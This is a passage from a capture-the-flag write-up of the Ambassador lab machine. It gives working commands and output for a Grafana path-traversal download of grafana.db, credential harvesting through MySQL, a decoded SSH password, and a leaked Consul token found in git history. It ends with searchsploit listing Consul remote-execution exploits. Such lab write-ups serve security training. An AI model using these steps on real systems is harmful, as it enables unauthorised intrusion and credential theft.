&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> curl &lt;span style="color:#b8bb26">&amp;#34;http://10.10.11.183:3000/public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/lib/grafana/grafana.db&amp;#34;&lt;/span> -o grafana.db
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can open this file using something like &lt;code>sqlitebrowser&lt;/code> and under the table &lt;code>data-source&lt;/code> we can see password to the user grafana:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/ambassador/Pasted%20image%2020230131182411.webp" alt="">&lt;p>And we can use these credentials to access not &lt;strong>SSH&lt;/strong> but &lt;strong>MySQL&lt;/strong> on port 3306&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> mysql -h 10.10.11.183 -u grafana -p
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Enter password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Welcome to the MySQL monitor. Commands end with ; or &lt;span style="color:#b8bb26">\g&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Your MySQL connection id is &lt;span style="color:#d3869b">11&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Server version: 8.0.30-0ubuntu0.20.04.2 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Copyright &lt;span style="color:#fe8019">(&lt;/span>c&lt;span style="color:#fe8019">)&lt;/span> 2000, 2022, Oracle and/or its affiliates.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Oracle is a registered trademark of Oracle Corporation and/or its
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>affiliates. Other names may be trademarks of their respective
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>owners.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Type &lt;span style="color:#b8bb26">&amp;#39;help;&amp;#39;&lt;/span> or &lt;span style="color:#b8bb26">&amp;#39;\h&amp;#39;&lt;/span> &lt;span style="color:#fe8019">for&lt;/span> help. Type &lt;span style="color:#b8bb26">&amp;#39;\c&amp;#39;&lt;/span> to clear the current input statement.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mysql&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Alright we got access to mysql console.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>mysql&amp;gt; show databases;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+--------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Database |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+--------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| grafana |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| information_schema |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| mysql |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| performance_schema |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| sys |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| whackywidget |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+--------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">6&lt;/span> rows in &lt;span style="color:#fabd2f">set&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>1.11 sec&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mysql&amp;gt; use whackywidget;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Reading table information &lt;span style="color:#fe8019">for&lt;/span> completion of table and column names
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>You can turn off this feature to get a quicker startup with -A
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Database changed
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mysql&amp;gt; show tables;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+------------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Tables_in_whackywidget |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+------------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| users |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+------------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">1&lt;/span> row in &lt;span style="color:#fabd2f">set&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>0.52 sec&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mysql&amp;gt; &lt;span style="color:#fe8019">select&lt;/span> * from users;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+-----------+------------------------------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| user | pass |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+-----------+------------------------------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg&lt;span style="color:#fe8019">==&lt;/span> |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+-----------+------------------------------------------+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">1&lt;/span> row in &lt;span style="color:#fabd2f">set&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>1.90 sec&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mysql&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And there&amp;rsquo;s the password for the user &lt;code>developer&lt;/code> ( &lt;strong>&lt;em>Note the hint from the hugo blog post&lt;/em>&lt;/strong> ) encoded in &lt;code>base64&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span> echo &amp;#34;YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==&amp;#34; | base64 -d
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>anEnglishManInNewYork027468
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Got the password now let&amp;rsquo;s ssh into the box and read the user flag.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> ssh developer@10.10.11.183
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@10.10.11.183s password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Welcome to Ubuntu 20.04.5 LTS &lt;span style="color:#fe8019">(&lt;/span>GNU/Linux 5.4.0-126-generic x86_64&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> * Documentation: https://help.ubuntu.com
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> * Management: https://landscape.canonical.com
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> * Support: https://ubuntu.com/advantage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> System information as of Tue &lt;span style="color:#d3869b">31&lt;/span> Jan &lt;span style="color:#d3869b">2023&lt;/span> 01:01:08 PM UTC
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> System load: 0.03
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Usage of /: 80.9% of 5.07GB
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Memory usage: 39%
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Swap usage: 0%
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Processes: &lt;span style="color:#d3869b">229&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Users logged in: &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> IPv4 address &lt;span style="color:#fe8019">for&lt;/span> eth0: 10.10.11.183
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> IPv6 address &lt;span style="color:#fe8019">for&lt;/span> eth0: dead:beef::250:56ff:feb9:e28b
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">0&lt;/span> updates can be applied immediately.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>The list of available updates is more than a week old.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>To check &lt;span style="color:#fe8019">for&lt;/span> new updates run: sudo apt update
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Last login: Tue Jan &lt;span style="color:#d3869b">31&lt;/span> 11:22:34 &lt;span style="color:#d3869b">2023&lt;/span> from 10.10.14.40
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:~$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:~$ id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>developer&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>developer&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>developer&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:~$ ls
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>snap user.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:~$ cat user.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>**************************
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>There&amp;rsquo;s a &lt;code>.gitconfig&lt;/code> file in the home directory:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:~$ cat .gitconfig
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>user&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> name &lt;span style="color:#fe8019">=&lt;/span> Developer
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> email &lt;span style="color:#fe8019">=&lt;/span> developer@ambassador.local
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>safe&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> directory &lt;span style="color:#fe8019">=&lt;/span> /opt/my-app
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>So let&amp;rsquo;s checkout &lt;code>/opt&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:~$ &lt;span style="color:#fabd2f">cd&lt;/span> /opt/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt$ ls -alp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>total &lt;span style="color:#d3869b">16&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">4&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Sep &lt;span style="color:#d3869b">1&lt;/span> 22:13 ./
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">20&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Sep &lt;span style="color:#d3869b">15&lt;/span> 17:24 ../
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">6&lt;/span> consul consul &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">31&lt;/span> 10:40 consul/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxrwxr-x &lt;span style="color:#d3869b">5&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> my-app/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt$ &lt;span style="color:#fabd2f">cd&lt;/span> my-app
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ ls -alp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>total &lt;span style="color:#d3869b">24&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxrwxr-x &lt;span style="color:#d3869b">5&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> ./
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">4&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Sep &lt;span style="color:#d3869b">1&lt;/span> 22:13 ../
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxrwxr-x &lt;span style="color:#d3869b">4&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> env/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxrwxr-x &lt;span style="color:#d3869b">8&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">14&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> .git/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw-rw-r-- &lt;span style="color:#d3869b">1&lt;/span> root root &lt;span style="color:#d3869b">1838&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> .gitignore
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxrwxr-x &lt;span style="color:#d3869b">3&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> whackywidget/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ &lt;span style="color:#fabd2f">cd&lt;/span> ..
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt$ &lt;span style="color:#fabd2f">cd&lt;/span> consul
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/consul$ ls -alp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>total &lt;span style="color:#d3869b">32&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">6&lt;/span> consul consul &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">31&lt;/span> 10:40 ./
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">4&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Sep &lt;span style="color:#d3869b">1&lt;/span> 22:13 ../
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw-r--r-- &lt;span style="color:#d3869b">1&lt;/span> consul consul &lt;span style="color:#d3869b">394&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> checkpoint-signature
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwx------ &lt;span style="color:#d3869b">2&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">31&lt;/span> 10:41 checks/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw------- &lt;span style="color:#d3869b">1&lt;/span> consul consul &lt;span style="color:#d3869b">36&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> node-id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">3&lt;/span> consul consul &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> raft/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">2&lt;/span> consul consul &lt;span style="color:#d3869b">4096&lt;/span> Mar &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> serf/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwx------ &lt;span style="color:#d3869b">2&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">31&lt;/span> 10:41 services/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;code>/opt/my-app&lt;/code> is a git directory and there&amp;rsquo;s a django app inside it. And then there&amp;rsquo;s &lt;a href="https://www.consul.io/">consul&lt;/a>&lt;/p>
&lt;blockquote>
&lt;p>&lt;em>Consul&lt;/em> is a service networking solution to automate network configurations, discover services, and enable secure connectivity across any cloud or runtime.&lt;/p>
&lt;/blockquote>
&lt;p>There&amp;rsquo;s an interesting script inside &lt;code>whackywidget&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app/whackywidget$ cat put-config-in-consul.sh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># We use Consul for application config in production, this script will help set the correct values for the app&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>According to the &lt;a href="https://developer.hashicorp.com/consul/commands/kv/put">consul docs&lt;/a>, the &lt;code>kv put&lt;/code> command writes the data to the given path in the KV store. We can try the &lt;code>kv get&lt;/code> command to read the password:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app/whackywidget$ consul kv get whackywidget/db/mysql_pw
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Error querying Consul agent: Unexpected response code: &lt;span style="color:#d3869b">403&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>Permission denied: token with AccessorID &lt;span style="color:#b8bb26">&amp;#39;00000000-0000-0000-0000-000000000002&amp;#39;&lt;/span> lacks permission &lt;span style="color:#b8bb26">&amp;#39;key:read&amp;#39;&lt;/span> on &lt;span style="color:#b8bb26">&amp;#34;whackywidget/db/mysql_pw&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Permission denied&amp;hellip;&lt;/p>
&lt;p>Let&amp;rsquo;s check if there&amp;rsquo;s a service running locally, then &lt;a href="https://developer.hashicorp.com/consul/api-docs/kv#sample-request">according to the api doc&lt;/a> we can try to get the key from &lt;code>/v1/kv/my-key&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ ss -tulpn | grep &lt;span style="color:#d3869b">8500&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>tcp LISTEN &lt;span style="color:#d3869b">0&lt;/span> &lt;span style="color:#d3869b">4096&lt;/span> 127.0.0.1:8500 0.0.0.0:*
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;code>8500&lt;/code> is the default port and it is listening.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ curl http://127.0.0.1:8500/v1/kv/my-key
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Permission denied: token with AccessorID &lt;span style="color:#b8bb26">&amp;#39;00000000-0000-0000-0000-000000000002&amp;#39;&lt;/span> lacks permission &lt;span style="color:#b8bb26">&amp;#39;key:read&amp;#39;&lt;/span> on &lt;span style="color:#b8bb26">&amp;#34;my-key&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Permission denied again&amp;hellip;&lt;/p>
&lt;p>Anyway let&amp;rsquo;s check the git history of &lt;code>my-app&lt;/code> using &lt;code>git log&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ git log --all --oneline
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>33a53ef &lt;span style="color:#fe8019">(&lt;/span>HEAD -&amp;gt; main&lt;span style="color:#fe8019">)&lt;/span> tidy config script
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>c982db8 config script
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>8dce657 created project with django CLI
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>4b8597b .gitignore
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer@ambassador:/opt/my-app$ git show c982db8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Author: Developer &amp;lt;developer@ambassador.local&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Date: Sun Mar &lt;span style="color:#d3869b">13&lt;/span> 23:44:45 &lt;span style="color:#d3869b">2022&lt;/span> +0000
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> config script
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>new file mode &lt;span style="color:#d3869b">100755&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>index 0000000..35c08f6
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>--- /dev/null
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+++ b/whackywidget/put-config-in-consul.sh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>@@ -0,0 +1,4 @@
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+# We use Consul &lt;span style="color:#fe8019">for&lt;/span> application config in production, this script will &lt;span style="color:#fabd2f">help&lt;/span> &lt;span style="color:#fabd2f">set&lt;/span> the correct values &lt;span style="color:#fe8019">for&lt;/span> the app
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+# Export MYSQL_PASSWORD before running
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>By checking out the previous commit, we can see the consul token.&lt;/p>
&lt;h2 id="consul-rce-via-services-api">Consul RCE via Services API&lt;/h2>
&lt;p>From &lt;code>searchsploit&lt;/code> output we can see that there&amp;rsquo;s a metasploit script that expoloits an &lt;strong>RCE&lt;/strong>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> searchsploit consul
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------ ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Exploit Title | Path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------ ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Hashicorp Consul - Remote Command Execution via Rexec &lt;span style="color:#fe8019">(&lt;/span>Meta | linux/remote/46073.rb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Hashicorp Consul - Remote Command Execution via Services AP | linux/remote/46074.rb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Hassan Consulting Shopping Cart 1.18 - Directory Traversal | cgi/remote/20281.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Ex | cgi/remote/21104.pl
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PHPLeague 0.81 - &lt;span style="color:#b8bb26">&amp;#39;/consult/miniseul.php?cheminmini&amp;#39;&lt;/span> Remote | php/webapps/28864.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------ ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Shellcodes: No Results
